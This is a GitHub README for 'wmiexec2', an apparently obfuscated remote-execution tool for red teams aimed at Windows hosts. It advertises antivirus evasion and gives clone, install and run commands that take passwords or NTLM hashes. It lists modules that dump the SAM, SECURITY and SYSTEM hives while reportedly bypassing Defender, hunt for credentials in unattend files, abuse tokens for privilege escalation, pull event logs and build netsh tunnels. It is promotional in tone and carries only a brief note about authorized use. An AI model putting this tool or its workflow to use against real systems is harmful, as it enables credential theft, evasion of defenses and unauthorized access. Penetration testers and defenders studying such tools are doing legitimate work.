The stealthy upgrade to everyone's favorite
wmiexec— obfuscated, enhanced, and red team ready.
💀 Bypass AV. Automate engagements. Dominate.
- 🎭 Obfuscated to evade signature-based AV detection
- 🛠️ Built-in red team modules for rapid automation
- 🐚 Supports
cmdandpowershellshell types - 📁 Local and remote file transfer (
lput,lget) - 📡 Netsh tunneling, token abuse, VM detection, and more
git clone https://github.com/ice-wzl/wmiexec2.git
cd wmiexec2/
pip3 install -r requirements.txt
⚠️ Do NOT usewgeton GitHub Raw — it will break emoji characters. Always usegit clone.
| Environment | Result |
|---|---|
| Windows Server 2022 (Feb 2024 updates) | ✅ All modules working |
| Windows 10 Pro, Defender v1.381.3595.0 | ✅ All modules working |
| Windows 10 Pro, Kaspersky Standard 21.8.5 | ✅ All modules working |
| Windows 8, Defender v1.383.35.0 | ✅ All modules working |
| Windows 7 Pro, Defender v1.95.191.0 (2010) |
python3 wmiexec2.py DOMAIN/USERNAME:PASSWORD@10.0.0.2 --shell-type powershell
python3 wmiexec2.py WORKGROUP/Administrator:'Password123!@#'@10.0.0.4 --shell-type cmdSupports both password and NTLM hash authentication
| Command | Description |
|---|---|
help |
Show available modules |
lcd <path> |
Change local working directory |
exit |
Exit shell |
lput <src> <dst> |
Upload file to target |
lget <file> |
Download file from target |
!<command> |
Run a command locally (e.g., !ls) |
ls [path] |
List target directory (uses dir /a) |
cat <file> |
Show remote file contents (alias for type) |
Display target user, hostname, IP, and architecture.
sysinfoLists common AV product processes via remote enumeration.
avChecks Defender installation, service status, exclusions, and tamper protection.
defenderDetects ESXi, VMware, QEMU, and VirtualBox environments.
vmcheckSearches for unattended install config files that may contain credentials.
unattendDumps SAM, SECURITY, and SYSTEM hives (bypasses Defender as of 6/7/24).
regripDownload .evtx logs from remote system.
loggrab Security.evtxEnumerates active tokens and suggests privesc paths.
tokensRun custom recon commands listed in survey.conf.
survey
survey saveaddtun 10000 10.0.0.5 443
showtun
deltun 10000If you get this error:
[-] Can't find a valid stringBinding to connect
-
Locate your
dcomrt.py:find / -type f -name "dcomrt.py" 2>/dev/null
-
Edit and replace:
# raise Exception("Can't find a valid stringBinding to connect") stringBinding = 'ncacn_ip_tcp:%s%s' % (self.get_target(), bindingPort) LOG.info("Can't find a valid stringBinding to connect, using default!")
✅ Done!
- This tool is under active development — submit PRs or issues.
- All modules built for stealth and speed.
- Use responsibly in authorized engagements.
If wmiexec2.0 saved you time or helped your ops:
🧠 Spread the knowledge. 🌍 Share the repo. ⭐ Star it.
ice-wzl
🐙 GitHub: ice-wzl
🛠️ Built with ❤️ for red teams.
